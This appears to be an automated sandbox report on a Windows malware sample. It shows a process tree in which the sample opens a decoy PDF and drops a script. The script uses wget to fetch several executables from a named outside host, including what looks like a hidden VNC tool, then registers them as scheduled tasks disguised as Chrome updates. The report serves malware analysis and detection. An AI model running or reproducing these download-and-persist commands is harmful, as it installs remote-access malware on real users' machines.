Overview
overview
10Static
static
1001/2015.5.27/01.vir
windows7_x64
301/2015.5.27/01.vir
windows10_x64
3PER-DCOMP-...ao.dll
windows7_x64
1PER-DCOMP-...ao.dll
windows10_x64
101/2015.5.27/03.exe
windows7_x64
801/2015.5.27/03.exe
windows10_x64
801/2015.5.27/04.exe
windows7_x64
101/2015.5.27/04.exe
windows10_x64
101/2015.5.27/05.exe
windows7_x64
1001/2015.5.27/05.exe
windows10_x64
1001/2015.5.27/07.exe
windows7_x64
701/2015.5.27/07.exe
windows10_x64
701/2015.5.27/09.exe
windows7_x64
1001/2015.5.27/09.exe
windows10_x64
1001/2015.5.27/10.exe
windows7_x64
1001/2015.5.27/10.exe
windows10_x64
1001/2015.5.27/12.pdf
windows7_x64
101/2015.5.27/12.pdf
windows10_x64
101/2015.5.27/13.pdf
windows7_x64
101/2015.5.27/13.pdf
windows10_x64
101/2015.5.27/14.exe
windows7_x64
801/2015.5.27/14.exe
windows10_x64
801/2015.5.27/15.dll
windows7_x64
101/2015.5.27/15.dll
windows10_x64
101/2015.5.27/16.rtf
windows7_x64
1001/2015.5.27/16.rtf
windows10_x64
101/2015.5.27/17.pdf
windows7_x64
101/2015.5.27/17.pdf
windows10_x64
101/2015.5.27/18.doc
windows7_x64
101/2015.5.27/18.doc
windows10_x64
1Analysis
-
max time kernel
119s -
max time network
159s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
28-01-2022 13:34
Behavioral task
behavioral1
Sample
01/2015.5.27/01.vir
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
01/2015.5.27/01.vir
Resource
win10-en-20211208
Behavioral task
behavioral3
Sample
PER-DCOMP-Intimacao.dll
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
PER-DCOMP-Intimacao.dll
Resource
win10-en-20211208
Behavioral task
behavioral5
Sample
01/2015.5.27/03.exe
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
01/2015.5.27/03.exe
Resource
win10-en-20211208
Behavioral task
behavioral7
Sample
01/2015.5.27/04.exe
Resource
win7-en-20211208
Behavioral task
behavioral8
Sample
01/2015.5.27/04.exe
Resource
win10-en-20211208
Behavioral task
behavioral9
Sample
01/2015.5.27/05.exe
Resource
win7-en-20211208
Behavioral task
behavioral10
Sample
01/2015.5.27/05.exe
Resource
win10-en-20211208
Behavioral task
behavioral11
Sample
01/2015.5.27/07.exe
Resource
win7-en-20211208
Behavioral task
behavioral12
Sample
01/2015.5.27/07.exe
Resource
win10-en-20211208
Behavioral task
behavioral13
Sample
01/2015.5.27/09.exe
Resource
win7-en-20211208
Behavioral task
behavioral14
Sample
01/2015.5.27/09.exe
Resource
win10-en-20211208
Behavioral task
behavioral15
Sample
01/2015.5.27/10.exe
Resource
win7-en-20211208
Behavioral task
behavioral16
Sample
01/2015.5.27/10.exe
Resource
win10-en-20211208
Behavioral task
behavioral17
Sample
01/2015.5.27/12.pdf
Resource
win7-en-20211208
Behavioral task
behavioral18
Sample
01/2015.5.27/12.pdf
Resource
win10-en-20211208
Behavioral task
behavioral19
Sample
01/2015.5.27/13.pdf
Resource
win7-en-20211208
Behavioral task
behavioral20
Sample
01/2015.5.27/13.pdf
Resource
win10-en-20211208
Behavioral task
behavioral21
Sample
01/2015.5.27/14.exe
Resource
win7-en-20211208
Behavioral task
behavioral22
Sample
01/2015.5.27/14.exe
Resource
win10-en-20211208
Behavioral task
behavioral23
Sample
01/2015.5.27/15.dll
Resource
win7-en-20211208
Behavioral task
behavioral24
Sample
01/2015.5.27/15.dll
Resource
win10-en-20211208
Behavioral task
behavioral25
Sample
01/2015.5.27/16.rtf
Resource
win7-en-20211208
Behavioral task
behavioral26
Sample
01/2015.5.27/16.rtf
Resource
win10-en-20211208
Behavioral task
behavioral27
Sample
01/2015.5.27/17.pdf
Resource
win7-en-20211208
Behavioral task
behavioral28
Sample
01/2015.5.27/17.pdf
Resource
win10-en-20211208
Behavioral task
behavioral29
Sample
01/2015.5.27/18.doc
Resource
win7-en-20211208
Behavioral task
behavioral30
Sample
01/2015.5.27/18.doc
Resource
win10-en-20211208
General
-
Target
01/2015.5.27/14.exe
-
Size
821KB
-
MD5
9ed9cb3fdd2a68a25665681a94879771
-
SHA1
ad957a4aca28e4ab343cd8151e9e218b39e3f595
-
SHA256
05a5bad78cdb97a78ca13bf4afa525a5294dbc9e6babb41a0861d48e76d64bcb
-
SHA512
15941df8d2dfb085e7604c3e94d4346cb59e240700dd06ceabe28d57cd471dc50ccb7448d5b9a3ac6b2642a3a09367d14819214c915ce4c069a476c43b7da223
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
Processes:
getcrome.exewget.exewget.exewget.exepid process 4588 getcrome.exe 1300 wget.exe 4252 wget.exe 4204 wget.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\wget.exe upx C:\Users\Admin\AppData\Local\Temp\wget.exe upx C:\Users\Admin\AppData\Local\Temp\wget.exe upx C:\Users\Admin\AppData\Local\Temp\wget.exe upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5104 schtasks.exe 4792 schtasks.exe 2144 schtasks.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 2 IoCs
Processes:
14.exegetcrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings 14.exe Key created \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000_Classes\Local Settings getcrome.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 28 IoCs
Processes:
wget.exewget.exewget.exeAcroRd32.exepid process 1300 wget.exe 1300 wget.exe 4252 wget.exe 4252 wget.exe 4204 wget.exe 4204 wget.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe 4628 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
14.exegetcrome.exeWScript.execmd.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 2616 wrote to memory of 4628 2616 14.exe AcroRd32.exe PID 2616 wrote to memory of 4628 2616 14.exe AcroRd32.exe PID 2616 wrote to memory of 4628 2616 14.exe AcroRd32.exe PID 2616 wrote to memory of 4588 2616 14.exe getcrome.exe PID 2616 wrote to memory of 4588 2616 14.exe getcrome.exe PID 2616 wrote to memory of 4588 2616 14.exe getcrome.exe PID 4588 wrote to memory of 1620 4588 getcrome.exe WScript.exe PID 4588 wrote to memory of 1620 4588 getcrome.exe WScript.exe PID 4588 wrote to memory of 1620 4588 getcrome.exe WScript.exe PID 1620 wrote to memory of 4968 1620 WScript.exe cmd.exe PID 1620 wrote to memory of 4968 1620 WScript.exe cmd.exe PID 1620 wrote to memory of 4968 1620 WScript.exe cmd.exe PID 4968 wrote to memory of 5068 4968 cmd.exe chcp.com PID 4968 wrote to memory of 5068 4968 cmd.exe chcp.com PID 4968 wrote to memory of 5068 4968 cmd.exe chcp.com PID 4968 wrote to memory of 1300 4968 cmd.exe wget.exe PID 4968 wrote to memory of 1300 4968 cmd.exe wget.exe PID 4968 wrote to memory of 1300 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4252 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4252 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4252 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4204 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4204 4968 cmd.exe wget.exe PID 4968 wrote to memory of 4204 4968 cmd.exe wget.exe PID 4968 wrote to memory of 2340 4968 cmd.exe cmd.exe PID 4968 wrote to memory of 2340 4968 cmd.exe cmd.exe PID 4968 wrote to memory of 2340 4968 cmd.exe cmd.exe PID 4968 wrote to memory of 2980 4968 cmd.exe find.exe PID 4968 wrote to memory of 2980 4968 cmd.exe find.exe PID 4968 wrote to memory of 2980 4968 cmd.exe find.exe PID 4968 wrote to memory of 5100 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5100 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5100 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5104 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5104 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5104 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5076 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5076 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 5076 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4792 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4792 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4792 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4760 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4760 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 4760 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 2144 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 2144 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 2144 4968 cmd.exe schtasks.exe PID 4968 wrote to memory of 3164 4968 cmd.exe PING.EXE PID 4968 wrote to memory of 3164 4968 cmd.exe PING.EXE PID 4968 wrote to memory of 3164 4968 cmd.exe PING.EXE PID 4628 wrote to memory of 4100 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 4100 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 4100 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 4872 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 4872 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 4872 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 720 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 720 4628 AcroRd32.exe RdrCEF.exe PID 4628 wrote to memory of 720 4628 AcroRd32.exe RdrCEF.exe PID 720 wrote to memory of 2452 720 RdrCEF.exe RdrCEF.exe PID 720 wrote to memory of 2452 720 RdrCEF.exe RdrCEF.exe PID 720 wrote to memory of 2452 720 RdrCEF.exe RdrCEF.exe PID 720 wrote to memory of 2452 720 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe"C:\Users\Admin\AppData\Local\Temp\01\2015.5.27\14.exe"1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\spisok.pdf"2⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140433⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AAA8491B831F694F647A4A0BBC4B699A --mojo-platform-channel-handle=1660 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0430AEDE0A7C4496FD9B34936C1E242F --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0430AEDE0A7C4496FD9B34936C1E242F --renderer-client-id=2 --mojo-platform-channel-handle=1676 --allow-no-sandbox-job /prefetch:14⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F594B7979BFBCDED06ABD4BCAD1E2CC3 --mojo-platform-channel-handle=1728 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F2424DB021AEF746707CA1949D05D66B --mojo-platform-channel-handle=2044 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=02B81E92D8A1815D520C3FA934D448CC --mojo-platform-channel-handle=2364 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:24⤵
-
C:\Users\Admin\AppData\Local\Temp\getcrome.exe"C:\Users\Admin\AppData\Local\Temp\getcrome.exe" -p000_2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\getchrome.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c getchrome.cmd4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 12515⤵
-
C:\Users\Admin\AppData\Local\Temp\wget.exewget.exe http://xiaomi-mi.com.ua/images/logo/chrome-xvnc-v5517.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\wget.exewget.exe http://xiaomi-mi.com.ua/images/logo/chromeupdates.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\wget.exewget.exe http://xiaomi-mi.com.ua/images/logo/updatesexplorer.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "5⤵
-
C:\Windows\SysWOW64\find.exefind "Microsoft Windows XP"5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn ChromeUpdates_vnc /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn ChromeUpdates_vnc /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chrome-xvnc-v5517.exe /SC MINUTE /mo 2405⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn ChromeUpdates_ups /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn ChromeUpdates_ups /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\chromeupdates.exe /SC MINUTE /mo 605⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Delete /tn ChromeUpdates_exp /f5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn ChromeUpdates_exp /TR "C:\Users\Admin\AppData\Roaming"\ChromeUpdates\updatesexplorer.exe /SC MINUTE /mo 105⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Runs ping.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\getchrome.cmdMD5
93c67990434454377a2eb13bcafd9a3e
SHA12d17bf5310bf73c7a7375c90877f5def35839fb6
SHA25687ae0c2981e35ba3fc0a00e9c6bf8cc57135c99dae06228212349859b0e82912
SHA512b3a3bd331827d1b0f0a1fc4619a935107405f0aad47e336d176d24f5245874ae7bd6f2d53555e9558a89f17e6223c59f0b4a0068476d39d30eccedffa52142cd
-
C:\Users\Admin\AppData\Local\Temp\getchrome.vbsMD5
97d6fbd4523605f4d2fd15c1a77d08d5
SHA1968e82657e1f72a4b8b357600e9f4e0d4270be06
SHA256a59e6b709804144908e1be82293d9565a08a035502cfbc84048d1e248c1e9a3d
SHA51216468adb77a98bf6c14596e3570661254e568c4586bb0058ac51f7fffb5f75ab28eb50e54e1473b8e616d6f4e50015765a780b6a95a2d00c800be81e46a339e5
-
C:\Users\Admin\AppData\Local\Temp\getcrome.exeMD5
90f8f8ea411d767d833f9697dd0dabf4
SHA107b81a40c08989a06dff1c0ac4f1b295b7ae5fce
SHA256c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df
SHA512ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6
-
C:\Users\Admin\AppData\Local\Temp\getcrome.exeMD5
90f8f8ea411d767d833f9697dd0dabf4
SHA107b81a40c08989a06dff1c0ac4f1b295b7ae5fce
SHA256c342321da3cb45344153dea18059ab9d90e281e4ac47ac49e39dc7fb1977b6df
SHA512ece4799c6cf188a293dd53df82c65d3447b9c7e441a89d2a4afbb59dc2f55ba141cfe03f70fce607696235464b161ab09cead75c956aa543e8165036ebe477f6
-
C:\Users\Admin\AppData\Local\Temp\spisok.pdfMD5
9a089260643dbb76ef4a0b26aa609362
SHA1d2f74a2ce15993b37e6f9c8a827d5dc9f3e0ddfb
SHA2563c26b7b0ca159004a80183083f778a4ddd52a8e985b9f6a38998a9bda45c4412
SHA512a78f42e2a70178c8361b6e8c25e5844d350df0e8f7ba734e4f113c6934952eb49f340af62baa4356a0de5a8780313110f94009723837102b5ad9004c06a69628
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Local\Temp\wget.exeMD5
bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
memory/1136-217-0x0000000077E12000-0x0000000077E13000-memory.dmpFilesize
4KB
-
memory/2388-228-0x0000000077E12000-0x0000000077E13000-memory.dmpFilesize
4KB
-
memory/2452-214-0x0000000077E12000-0x0000000077E13000-memory.dmpFilesize
4KB
-
memory/3084-222-0x0000000077E12000-0x0000000077E13000-memory.dmpFilesize
4KB
-
memory/3596-225-0x0000000077E12000-0x0000000077E13000-memory.dmpFilesize
4KB